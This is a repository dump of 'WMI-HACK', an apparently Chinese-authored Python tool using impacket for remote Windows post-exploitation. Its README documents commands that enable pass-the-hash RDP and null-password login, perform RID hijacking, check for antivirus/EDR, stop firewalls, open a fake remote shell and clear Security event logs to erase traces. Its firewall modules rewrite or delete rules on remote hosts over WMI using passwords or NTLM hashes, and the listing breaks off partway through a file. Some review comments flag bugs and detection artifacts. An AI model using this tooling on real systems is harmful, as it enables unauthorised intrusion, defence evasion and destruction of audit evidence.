├── README.md ├── img ├── 360_av.png ├── AV_EDR_QUERY.png ├── Disable_pth_rdp_login.png ├── Enable_User.png ├── Enable_Winrm.png ├── Enable_pth_rdp_login.png ├── Enable_rdp.png ├── RDP_disable.png ├── Users_query.png ├── check2.png ├── check3.png ├── check_firewall.png ├── cleartrace.png ├── delete_file.png ├── disable_firewall_rule.png ├── enable_firewall_role.png ├── fake_shell.png ├── fake_shell2.png ├── firewall_query.png ├── get_process.png ├── ls_path.png ├── query1a.png ├── query3.png ├── query_all_firewall_rule.png ├── query_disable_firewall_rule.png ├── query_enable_firewall_rule.png ├── query_enable_inbound_firewall_rule.png ├── query_enable_outbound_firewall_rule.png ├── rdp_shadow.png ├── readfile.png ├── rid_hijack.gif ├── stop_FIrewall.png ├── stop_winrm.png ├── winrm_firewall.png ├── write_file.png └── write_file2.png ├── module ├── FirewallRule_setting.py ├── Firewall_setting.py ├── __init__.py ├── check.py ├── checkError.py ├── clearEventLog.py ├── cleartrace.py ├── cmdrun.py ├── cmdrun2.py ├── dumpLsass.py ├── enable_pth_login_rdp.py ├── files.py ├── getProcessList.py ├── listdir.py ├── printReply.py ├── rdpsetting.py ├── ridhijack.py ├── userquery.py ├── vbsrun.py ├── winrm_enable.py └── wmiconnect.py ├── output ├── clearEventLog.vbs ├── dele_file.vbs ├── delete_file.vbs ├── exec2_command.vbs ├── exec_command_read.vbs ├── listdir.vbs ├── readfile.vbs ├── reg_permission.vbs └── writeFile.vbs ├── vbs ├── clearEventLog.vbs ├── cleartrace.vbs ├── dele_file.vbs ├── delete_file.vbs ├── exec2_command.vbs ├── exec_command_read.vbs ├── listdir.vbs ├── readfile.vbs ├── reg_permission.vbs ├── regini.vbs └── writeFile.vbs └── wmi_query.py /README.md: -------------------------------------------------------------------------------- 1 | # WMI-HACK ## 2 | 3 | ## 更新 ## 4 | * 基本功能实现 5 | * 通过base64编码传入vbs,vbs base64解码避免中文或者其他语言造成latin-1编码问题 6 | * 更新RID劫持/用户启用或者禁用 7 | * 执行过程清除 8 | 9 | ## 其他 ## 10 | 1. 
纯属写来练手,感谢离爹提供的帮助,推荐小离的项目:https://github.com/XiaoliChan/wmiexec-Pro 11 | 2. vbs代码大量来源于网上 12 | 13 | ## 需求 ## 14 | python3 15 | impacket模块 16 | ```text 17 | pip3 install impacket 18 | ``` 19 | 20 | ## 项目架构 ## 21 | ```text 22 | ├───img 23 | ├───module #模块 24 | ├───output #vbs调用产生的临时vbs文件夹 25 | ├───vbs #模块所使用的vbs模板 26 | wmi_query.py 27 | ``` 28 | 29 | ## 功能 ### 30 | * 获取进程列表 31 | * 远程请求查询进程列表站点对比进程 32 | * 用户名查询 33 | * RDP开启/关闭 34 | * PTH RDP登录开启/关闭 35 | * winrm服务开启/关闭 36 | * 防火墙规则查询 37 | * 启用的防火墙规则查询 38 | * 禁用的防火墙规则查询 39 | * 允许入站的防火墙规则查询 40 | * 禁止入站的防火墙规则连接 41 | * 启用允许入站的防火墙规则查询 42 | * 禁用防火墙入站的防火墙规则查询 43 | * 开启/关闭某条防火墙规则 44 | * 防火墙查询/关闭/开启 45 | * 运行vbs 46 | * 只运行一次vbs 47 | * 日志清除 48 | * 通过Win32_ScheduledJob命令执行 (适用于NT 6.0或以下) 49 | * 通过vbs创建计划任务执行命令 (适用于NT 6.0以上) 50 | * 伪造的交互shell 51 | * 文件写入/文件读取/文件删除 52 | * 文件夹查询 53 | * 空密码登录启用 54 | * 用户RID查询 55 | * RID劫持 56 | * 执行过程清除 57 | 58 | ```text 59 | Usage: 60 | python wmi_query -i -u -p -g #Get Process List 61 | python wmi_query -i -u -p -g -q #query Av/EDR/Process 62 | python wmi_query -i -u -p -U #User Query 63 | python wmi_query -i -u -p -R 1 #Enable rdp 64 | python wmi_query -i -u -p -R 0 #Disable rdp 65 | python wmi_query -i -u -p -R 2 #Query rdp Port 66 | python wmi_query -i -u -p -E 1 #Enable PTH rdp 67 | python wmi_query -i -u -p -E 0 #Disable PTH rdp 68 | python wmi_query -i -u -p -W 1 #Enable winrm service 69 | python wmi_query -i -u -p -F query # query all Firewall rule 70 | python wmi_query -i -u -p -F query1 #query Enable Firewall rule 71 | python wmi_query -i -u -p -F query2 #query Disable Firewall rule 72 | python wmi_query -i -u -p -F querya #query inbound Firewall rule 73 | python wmi_query -i -u -p -F queryb #query outbound Firewall rule 74 | python wmi_query -i -u -p -F query1a #query Enable inbound Firewall rule 75 | python wmi_query -i -u -p -F query2a #query Disable inbound Firewall rule 76 | python wmi_query -i -u -p -F query1b #query Enable outbound Firewall rule 77 | python wmi_query -i -u -p -F 
query2b #query Disable outbound Firewall rule 78 | python wmi_query -i -u -p -F query3 #query InstanceID Firewall rule 79 | python wmi_query -i -u -p -F delete #delete InstanceID Firewall rule 80 | python wmi_query -i -u -p -F disable #Disable a firewall rule 81 | python wmi_query -i -u -p -F enable #Enable a firewall rule 82 | python wmi_query -i -u -p -f query #query Firewall 83 | python wmi_query -i -u -p -f stop #stop Firewall 84 | python wmi_query -i -u -p -F start #start Firewall 85 | python wmi_query -i -u -p -V #(vbs_id:Example) Run Vbs (The vbs is run repeatedly at intervals of 2 seconds, and the --stop_vbs parameter must be used to stop) 86 | python wmi_query -i -u -p --stop_vbs /--stop_vbs 1 #-- stop 1 stop default(vbsid:Example) vbs running on repeat/stop use --stop 87 | python wmi_query -i -u -p --one_vbs #vbs that only runs once 88 | python wmi_query -i -u -p --execute_command #To execute the command through Win32_ScheduledJob (NT 6.0), you need to wait for 1 minute 89 | python wmi_query -i -u -p --clear_eventlog #cear eventlog logName:appllication,system,setup,forwardedevents,security 90 | python wmi_query -i -u -p --clear_eventlog --cycle_clear# This will execute clear EventLog vbs forever(To stop use --stop ) 91 | python wmi_query -i -u -p --execute_command2 #execute command 92 | python wmi_query -i -u -p --shell #Command execution mode 2 to get a fake shell 93 | python wmi_query -i -u -p --writefile --save-to-file # remote file writing 94 | python wmi_query -i -u -p --readfile --save-to-file # remote file reading 95 | python wmi_query -i -u -p --ls #Query files and folders of a certain path 96 | python wmi_query -i -u -p --rdp-shadow #Rdp Shadow Setting 97 | python wmi_query -i -u -p --nulllogin 0 #Enable null password login 98 | python wmi_query -i -u -p --nulllogin 0 #Disable null password login 99 | python wmi_query -i -u -p --user-rid-query #Users RID Query 100 | python wmi_query -i -u -p --ridhijack 1f5(src_id),1f4(target_rid) #Rid Hijack 
Example 101 | python wmi_query -i -u -p --set-user ,0 #Disable User 102 | python wmi_query -i -u -p --set-user ,1 #Enable User 103 | python wmi_query -i -u -p --cleartrace #Clear usage traces,On cycle clearEventLog Security 104 | Usage: wmi_query.py [options] 105 | 106 | Options: 107 | -h, --help show this help message and exit 108 | -i IP target IP 109 | -u USERNAME auth username 110 | -d DOMAIN target domain 111 | -p PASSWORD auth password 112 | -n NTLM auth ntlm/lm 113 | -g get process list 114 | -q query Av/EDR/Process 115 | -U user list query 116 | -R ENABLE_RDP enable rdp/disable rdp 117 | -E ENABLE_PTH enable rdp pth login 118 | -W ENABLE_WINRM enable winrm service 119 | -F NETFIREWALLRULE Query/Enable/Disable NetFirewallRule 120 | -f FIREWALL Start/Stop firewall 121 | -V VBS Run vbs 122 | --stop_vbs=STOP_VBS stop Default vbs Runing or Stop the id of vbs running 123 | --one_vbs_run=ONE_VBS_RUN 124 | vbs that only runs once 125 | --execute_command=EXECUTE_COMMAND 126 | execute command (NT 6.0) 127 | --execute_command2=EXECUTE_COMMAND2 128 | execute command 129 | --clear_eventlog=CLEAR_EVENTLOG 130 | clear event log 131 | --cycle_clear cycle clear eventlog 132 | --shell fake shell 133 | --writefile=WRITEFILE 134 | write file 135 | --readfile=READFILE read file 136 | --save-to-file=OUTFILE 137 | write file save as path 138 | --ls=LSDIR Query files and folders of a certain path 139 | --dele-file=DELETEFILE 140 | remove file 141 | --rdp-shadow=RDPSHADOW 142 | rdp shadow setting (-1-Delete Shadow reg key,0-No 143 | remote control allowed,1-Full Control with User 144 | Rights,2-Full control without user permission,3-View 145 | sessions with user permissions,4-View conversations 146 | without user permission) 147 | --nulllogin=NONELOGIN 148 | Login with empty password 149 | --user-rid-query Users RID Query 150 | --ridhijack=RDIHIJACK 151 | RID hijack (--ridhijack 152 | ,) 153 | --set-user=SETUSER Enable/Disable User(--setuser ,1/0) 154 | --cleartrace Clear usage 
traces 155 | 156 | ``` 157 | 158 | ## get process list ## 159 | ![](img/get_process.png) 160 | 161 | ## Query Antivirus/EDR ## 162 | ![](img/AV_EDR_QUERY.png) 163 | 164 | ## Users Query ## 165 | ![](img/Users_query.png) 166 | 167 | ## Enable/Disable Rdp ## 168 | Disable RDP 169 | ![](img/RDP_disable.png) 170 | 171 | Enable RDP 172 | ![](img/Enable_rdp.png) 173 | 174 | 175 | ## Enable/Disable PTH rdp ## 176 | ![](img/Enable_pth_rdp_login.png) 177 | 178 | **Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace 179 | Unable to configure firewall rules** 180 | 181 | ![](img/Disable_pth_rdp_login.png) 182 | 183 | ## Enable/Disable winrm Service ## 184 | ![](img/Enable_Winrm.png) 185 | 186 | the Firewall Name set spance 187 | ![](img/winrm_firewall.png) 188 | 189 | ![](img/stop_winrm.png) 190 | 191 | ## Firewall rule setting ## 192 | query all Firewall rule 193 | ![](img/query_all_firewall_rule.png) 194 | 195 | query Enable Firewall rule 196 | ![](img/query_enable_firewall_rule.png) 197 | 198 | query Disable Firewall rule 199 | ![](img/query_disable_firewall_rule.png) 200 | 201 | query inbound Firewall rule 202 | ![](img/query_enable_inbound_firewall_rule.png) 203 | 204 | query outbound Firewall rule 205 | ![](img/query_enable_outbound_firewall_rule.png) 206 | 207 | query Enable inbound Firewall rule 208 | ![](img/query1a.png) 209 | 210 | ........... 
211 | 212 | query InstanceID Firewall rule 213 | ![](img/query3.png) 214 | 215 | enable/disable Firewall rule 216 | ![](img/disable_firewall_rule.png) 217 | 218 | ![](img/check_firewall.png) 219 | 220 | ![](img/enable_firewall_role.png) 221 | 222 | ![](img/check2.png) 223 | 224 | ## Firewall setting ## 225 | ![](img/firewall_query.png) 226 | 227 | start/stop Firewall 228 | ![](img/stop_FIrewall.png) 229 | 230 | ![](img/check3.png) 231 | 232 | ## fake shell ## 233 | ![](img/fake_shell.png) 234 | 235 | ![](img/fake_shell2.png) 236 | 237 | ## write file ## 238 | ![](img/write_file.png) 239 | 240 | ![](img/write_file2.png) 241 | 242 | ## read file ## 243 | ![](img/readfile.png) 244 | 245 | ## ls file path ## 246 | ![](img/ls_path.png) 247 | 248 | ## RDP shadow ## 249 | ![](img/rdp_shadow.png) 250 | 251 | ## User Enable/User Ridsable ## 252 | ![](img/Enable_User.png) 253 | 254 | ## RID Hijack ## 255 | 使用 256 | 1.启用空密码登录 257 | ```text 258 | python wmi_query -i -u -p --nulllogin 0 #Enable null password login 259 | ``` 260 | 2.用户RID查询 261 | ```text 262 | python wmi_query -i -u -p --user-rid-query 263 | ``` 264 | 3.RID劫持 265 | ```text 266 | python wmi_query -i -u -p --ridhijack 1f5(src_id),1f4(target_rid) 267 | ``` 268 | ![](img/rid_hijack.gif) 269 | 270 | PS: 271 | RID劫持和启用用户/禁用用户会被某些杀毒拦截,使用时自行注意 272 | ![](img/360_av.png) 273 | 274 | ## cleartrace ## 275 | 清除残留在`ROOT\subscription:ActiveScriptEventConsumer`下的UID和C:\Windows\Temp下命令执行 276 | 或者异常留下的txt,循环清除windows Security日志 277 | ![](img/cleartrace.png) -------------------------------------------------------------------------------- /img/360_av.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/360_av.png -------------------------------------------------------------------------------- /img/AV_EDR_QUERY.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/AV_EDR_QUERY.png -------------------------------------------------------------------------------- /img/Disable_pth_rdp_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Disable_pth_rdp_login.png -------------------------------------------------------------------------------- /img/Enable_User.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_User.png -------------------------------------------------------------------------------- /img/Enable_Winrm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_Winrm.png -------------------------------------------------------------------------------- /img/Enable_pth_rdp_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_pth_rdp_login.png -------------------------------------------------------------------------------- /img/Enable_rdp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_rdp.png -------------------------------------------------------------------------------- /img/RDP_disable.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/RDP_disable.png 
-------------------------------------------------------------------------------- /img/Users_query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Users_query.png -------------------------------------------------------------------------------- /img/check2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/check2.png -------------------------------------------------------------------------------- /img/check3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/check3.png -------------------------------------------------------------------------------- /img/check_firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/check_firewall.png -------------------------------------------------------------------------------- /img/cleartrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/cleartrace.png -------------------------------------------------------------------------------- /img/delete_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/delete_file.png -------------------------------------------------------------------------------- /img/disable_firewall_rule.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/disable_firewall_rule.png -------------------------------------------------------------------------------- /img/enable_firewall_role.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/enable_firewall_role.png -------------------------------------------------------------------------------- /img/fake_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/fake_shell.png -------------------------------------------------------------------------------- /img/fake_shell2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/fake_shell2.png -------------------------------------------------------------------------------- /img/firewall_query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/firewall_query.png -------------------------------------------------------------------------------- /img/get_process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/get_process.png -------------------------------------------------------------------------------- /img/ls_path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/ls_path.png 
-------------------------------------------------------------------------------- /img/query1a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query1a.png -------------------------------------------------------------------------------- /img/query3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query3.png -------------------------------------------------------------------------------- /img/query_all_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_all_firewall_rule.png -------------------------------------------------------------------------------- /img/query_disable_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_disable_firewall_rule.png -------------------------------------------------------------------------------- /img/query_enable_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_enable_firewall_rule.png -------------------------------------------------------------------------------- /img/query_enable_inbound_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_enable_inbound_firewall_rule.png -------------------------------------------------------------------------------- 
/img/query_enable_outbound_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_enable_outbound_firewall_rule.png -------------------------------------------------------------------------------- /img/rdp_shadow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/rdp_shadow.png -------------------------------------------------------------------------------- /img/readfile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/readfile.png -------------------------------------------------------------------------------- /img/rid_hijack.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/rid_hijack.gif -------------------------------------------------------------------------------- /img/stop_FIrewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/stop_FIrewall.png -------------------------------------------------------------------------------- /img/stop_winrm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/stop_winrm.png -------------------------------------------------------------------------------- /img/winrm_firewall.png: -------------------------------------------------------------------------------- 
# https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/winrm_firewall.png
# --------------------------------------------------------------------------------
# /img/write_file.png:
# --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/write_file.png
# --------------------------------------------------------------------------------
# /img/write_file2.png:
# --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/write_file2.png
# --------------------------------------------------------------------------------
# /module/FirewallRule_setting.py:
# --------------------------------------------------------------------------------
from module import *
from module import wmiconnect
import colorama


def FirewallRule_setting(ip: str = '', username: str = '', password: str = '', domain: str = '', hashes: str = '', aesKey: str = '', arg: str = "") -> None:
    """Query, enable/disable or delete MSFT_NetFirewallRule instances on a remote host via WMI.

    Connects through ``wmiconnect.wmiconnect`` and logs into the
    ``//./root/StandardCimv2`` namespace (where ``MSFT_NetFirewallRule`` lives).

    Args:
        ip, username, password, domain, hashes, aesKey: forwarded unchanged to
            ``wmiconnect.wmiconnect``; their exact semantics are that helper's.
        arg: sub-command. ``query``/``query1``/``query2``/``querya``/``queryb``/
            ``query1a``/``query2a``/``query1b``/``query2b`` list rules;
            ``query3``, ``enable``, ``disable`` and ``delete`` read an InstanceID
            from stdin first.

    Returns:
        None. Output goes to stdout; ``exit()`` is called on a bad ``arg`` or when
        the namespace is missing.
    """
    # NOTE(review): any value starting with "query" passes this guard, but only the
    # spellings handled below assign ``wql``; an unknown "query..." value reaches
    # ExecQuery(wql) with ``wql`` unbound (NameError).
    if arg[0:5]!="query" and arg!="enable" and arg!="disable" and arg!="delete":
        print("[-] Pluse Query Help,Thanks....")
        exit()

    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    try:
        iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/StandardCimv2', NULL, NULL)
    except Exception as error:
        if "WBEM_E_INVALID_NAMESPACE" in str(error):
            print("[*] The OS possible:Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace\nUnable to configure firewall rules")
            dcom.disconnect()
            exit()
        # NOTE(review): for any other login error ``iWbemServices`` stays unbound and
        # the DCOM connection is never disconnected before the NameError below.
    if arg == "query1":  # enabled rules
        wql="select * from MSFT_NetFirewallRule where Enabled=1"
        print("[*] Select Enable Firewall Rule")
    if arg == "query2":  # disabled rules
        wql="select * from MSFT_NetFirewallRule where Enabled=2"
        print("[*] Select Disable Firewall Rule")
    if arg == "query":  # all rules
        wql="select * from MSFT_NetFirewallRule"
        print("[*] Select all Firewall Rule")
    if arg=="querya":  # inbound rules
        wql="select * from MSFT_NetFirewallRule where Direction=1"
        print("[*] Select inbound Firewall Rule")
    elif arg=="queryb":  # outbound rules
        wql="select * from MSFT_NetFirewallRule where Direction=2"
        print("[*] Select outbound Firewall Rule")
    elif arg=="query1a":  # enabled inbound rules
        wql = "select * from MSFT_NetFirewallRule where Direction=1 and Enabled=1"
        print("[*] Select Enable inbound Firewall Rule")
    elif arg=="query2a":  # disabled inbound rules
        wql = "select * from MSFT_NetFirewallRule where Direction=1 and Enabled=2"
        print("[*] Select Disable inbound Firewall Rule")
    elif arg=="query1b":  # enabled outbound rules
        wql = "select * from MSFT_NetFirewallRule where Direction=2 and Enabled=1"
        print("[*] Select Enable outbound Firewall Rule")
    elif arg=="query2b":  # disabled outbound rules
        wql = "select * from MSFT_NetFirewallRule where Direction=2 and Enabled=2"
        print("[*] Select Disable outbound Firewall Rule")
    elif arg=="query3":  # look up one rule by InstanceID
        user=input("InstanceID:")
        # The InstanceID is interpolated into WQL unescaped; a double quote in the
        # input breaks the query.
        wql="select * from MSFT_NetFirewallRule where InstanceID=\"{}\"".format(user)
        print("[*] Select InstanceID Query")


    wql2 = "select * from MSFT_NetFirewallRule where InstanceID="
    if "query" in arg:
        MSFT_NetFirewallRule = iWbemServices.ExecQuery(wql)
        while True:
            try:
                pEnum = MSFT_NetFirewallRule.Next(0xffffffff, 1)[0]
                action=int(pEnum.Action)
                Description=pEnum.Description
                DisplayName=pEnum.DisplayName
                ElementName=pEnum.ElementName
                InstanceID=pEnum.InstanceID
                Enabled=int(pEnum.Enabled)
                # NOTE(review): an Action other than 2/4 leaves ``type_`` unbound; the
                # resulting NameError is swallowed by the except below and the rule is
                # silently skipped.
                if action==4:
                    type_="block connection"
                elif action==2:
                    type_="allow connection"
                if Enabled==1:
                    color=colorama.Fore.GREEN
                    enable_status=True
                else:
                    color=colorama.Fore.RED
                    enable_status=False
                # NOTE(review): this inner Next() uses the same end-of-enumeration
                # signal as the outer loop, so a rule with no matching port-filter row
                # would raise WBEM_S_FALSE here and end the whole listing early.
                MSFT_NetProtocolPortFilter=iWbemServices.ExecQuery("select * from MSFT_NetProtocolPortFilter where InstanceID=\"{}\"".format(InstanceID)).Next(0xffffffff, 1)[0]
                MSFT_NetProtocolPortFilter_LocalPort=MSFT_NetProtocolPortFilter.LocalPort
                MSFT_NetProtocolPortFilter_RemotePort=MSFT_NetProtocolPortFilter.RemotePort
                MSFT_NetProtocolPortFilter_Protocol=MSFT_NetProtocolPortFilter.Protocol
                output=color+"Type:{} {} {} {} InstanceID:{} Enable:{} || Protocol:{} LocalPort:{} RemotePort:{}".format(type_,Description,DisplayName,ElementName,InstanceID,enable_status,MSFT_NetProtocolPortFilter_Protocol,MSFT_NetProtocolPortFilter_LocalPort,MSFT_NetProtocolPortFilter_RemotePort)+colorama.Style.RESET_ALL
                print(output)
            except Exception as error:
                # Only WBEM_S_FALSE (end of enumeration) leaves the loop; a persistent
                # other error from Next() would keep this loop spinning.
                if "WBEM_S_FALSE" in str(error):
                    break
                else:
                    pass
    elif arg=="disable" or arg=="enable":  # enable/disable one firewall rule
        print("[*] {} FirewallRule".format(arg))
        InstanceID=input("Input {} InstanceID:".format(arg))
        if arg=="disable":
            status=2
        elif arg=="enable":
            status=1
        wql2+='"{}"'.format(InstanceID)
        print(wql2)
        # Calling the Disable method directly did not succeed; the rule is force-overwritten instead.
        '''
        disable = iWbemServices.ExecQuery(wql2)
        pEnum = disable.Next(0xffffffff, 1)[0]
        print(pEnum.Disable)
        '''
        try:
            iEnumWbemClassObject = iWbemServices.ExecQuery(wql2)
            firewall_RuleClass = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
            # firewall_RuleClass.Enable
            # ``record`` holds the rule's current properties but is never read below.
            record = firewall_RuleClass.getProperties()
            record = dict(record)
            # NOTE(review): the instance written back is built entirely from the fixed
            # values below, not from ``record``, so PutInstance rewrites the whole rule
            # (name, action, direction, profiles) rather than only its Enabled flag.
            # NOTE(defense): a firewall rule carrying DisplayName "AAAAAAAAAAAAAAA" or
            # CreationClassName "fuckyouaasasasaasas" is a high-fidelity artifact of
            # this code path.
            firewall_Instance = firewall_RuleClass.SpawnInstance()
            firewall_Instance.Enabled = status
            firewall_Instance.CreationClassName = "fuckyouaasasasaasas"
            firewall_Instance.PolicyRuleName = ""
            firewall_Instance.SystemCreationClassName = ""
            firewall_Instance.SystemName = ""
            # allow=2, allowBypass=3, Block=4
            firewall_Instance.Action = 2
            firewall_Instance.Caption = ""
            firewall_Instance.CommonName = ""
            firewall_Instance.ConditionListType = 3
            firewall_Instance.Description = ""
            firewall_Instance.Direction = 1
            firewall_Instance.DisplayGroup = ""
            firewall_Instance.DisplayName = "AAAAAAAAAAAAAAA"
            firewall_Instance.EdgeTraversalPolicy = 0
            firewall_Instance.ElementName = " "
            firewall_Instance.EnforcementStatus = [0]
            firewall_Instance.ExecutionStrategy = 2
            firewall_Instance.LocalOnlyMapping = False
            firewall_Instance.LooseSourceMapping = False
            firewall_Instance.Mandatory = ""
            firewall_Instance.Owner = ""
            firewall_Instance.PolicyDecisionStrategy = 2
            firewall_Instance.PolicyKeywords = ""
            firewall_Instance.PolicyRoles = ""
            firewall_Instance.PolicyStoreSource = "PersistentStore"
            firewall_Instance.PolicyStoreSourceType = 1
            firewall_Instance.PrimaryStatus = 1
            firewall_Instance.Profiles = 0
            firewall_Instance.RuleGroup = ""
            firewall_Instance.RuleUsage = ""
            firewall_Instance.SequencedActions = 3
            firewall_Instance.Status = "The rule was parsed successfully from the store."
            firewall_Instance.StatusCode = 65536
            print(iWbemServices.PutInstance(firewall_Instance.marshalMe()))
        except Exception as error:
            # Only the "no such instance" case is reported; other errors are silent.
            if str(error).find("S_FALSE")>0:
                print("[-] Not Found InstanceID:{} Firewall a Roule".format(InstanceID))

    elif arg=="delete":
        ID=input("Delete Firewall InstanceID:")
        try:
            # ID is interpolated into WQL unescaped (same caveat as query3).
            iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM MSFT_NetFirewallRule where InstanceID = \"%s\"" % ID)
            firewall_RuleClass = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
            record = dict(firewall_RuleClass.getProperties())
            # The object path for DeleteInstance is rebuilt from the rule's own key
            # properties as read back from the server.
            print(iWbemServices.DeleteInstance('MSFT_NetFirewallRule.CreationClassName="{}",PolicyRuleName="{}",SystemCreationClassName="{}",SystemName="{}"'.format(record['CreationClassName']['value'],record['PolicyRuleName']['value'],record['SystemCreationClassName']['value'],record['SystemName']['value'])))
        except Exception as error:
            if str(error).find("S_FALSE")>0:
                print("[-] Not Found InstanceID:{} Firewall a Roule".format(ID))
    dcom.disconnect()
# --------------------------------------------------------------------------------
# /module/Firewall_setting.py:
# --------------------------------------------------------------------------------
from module import *
from module import wmiconnect


def Firewall_setting(ip: str = '', username: str = '', password: str = '', domain: str = '', hashes: str = '', aesKey: str = '', arg: str = "") -> None:
    """List, start or stop Windows firewall profiles (MSFT_NetFirewallProfile) on a remote host via WMI.

    Args:
        ip, username, password, domain, hashes, aesKey: forwarded unchanged to
            ``wmiconnect.wmiconnect``.
        arg: ``query`` prints every profile; ``start``/``stop`` prompt for a profile
            Name on stdin and write its Enabled property back (2 for start, 0 for stop).

    Returns:
        None. ``exit()`` is called on a bad ``arg`` or a missing namespace.
    """
    if arg[0:5] != "query" and arg != "start" and arg != "stop":
        print("[-] Pluse Query Help,Thanks....")
        exit()


    dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey)
    try:
        iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/StandardCimv2', NULL, NULL)
    except Exception as error:
        if "WBEM_E_INVALID_NAMESPACE" in str(error):
            print(
                "[*] The OS possible:Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace\nUnable to configure firewall rules")
            dcom.disconnect()
            exit()
        # NOTE(review): other login errors leave ``iWbemServices`` unbound (see the
        # same pattern in FirewallRule_setting).
    WQL="SELECT * FROM MSFT_NetFirewallProfile"
    if "query"==arg:
        firewall_list=iWbemServices.ExecQuery(WQL)
        while True:
            try:
                pEnum = firewall_list.Next(0xffffffff, 1)[0]
                InstanceID=pEnum.InstanceID
                Name=pEnum.Name
                EnableID=pEnum.Enabled
